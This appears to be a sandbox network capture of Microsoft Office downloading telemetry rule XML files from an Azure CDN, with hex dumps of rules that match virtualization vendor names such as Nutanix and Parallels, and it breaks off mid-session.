                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                                                                                                                        x-ms-request-id: d9045dfb-101e-00a2-06d5-339f2e000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153704Z-174f7845968qj8jrhC1EWRh41s00000004zg00000000nvtr
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        60192.168.2.44981413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 01111fca-d01e-002b-41d5-3325fb000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153704Z-174f7845968nxc96hC1EWRspw800000004xg0000000078ax
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        61192.168.2.44981313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                                                                                                                        x-ms-request-id: c8358f32-201e-005d-77d5-33afb3000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153704Z-174f78459684bddphC1EWRbht400000004u000000000md96
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        62192.168.2.44981513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1c14d510-c01e-0079-05d5-33e51a000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153704Z-174f7845968frfdmhC1EWRxxbw000000056000000000c2h2
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        63192.168.2.44981613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 477
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 4e338e66-401e-0016-6fd5-3353e0000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153704Z-174f7845968v79b7hC1EWRu01s00000004ng00000000rtnz
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        64192.168.2.44981713.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 419
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 65802b10-501e-000a-61d5-330180000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153704Z-174f7845968ljs8phC1EWRe6en00000004xg00000000ktc3
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        65192.168.2.44981813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:04 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 472
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 6193c1ec-701e-000d-35d5-336de3000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153704Z-174f7845968xlwnmhC1EWR0sv800000004zg00000000aux5
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:04 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        66192.168.2.44981913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 4e338eb5-401e-0016-3ad5-3353e0000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f7845968v79b7hC1EWRu01s00000004u0000000006qnt
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        67192.168.2.44982313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:05 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 427
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BB556A907"
                                                                                                                                                                                                                                                                                        x-ms-request-id: feb35d59-101e-0079-01d5-335913000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153705Z-174f7845968vwdr7hC1EWRsh3w000000050g00000000mm2p
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        68192.168.2.44982013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:05 UTC470INHTTP/1.1 200 OK
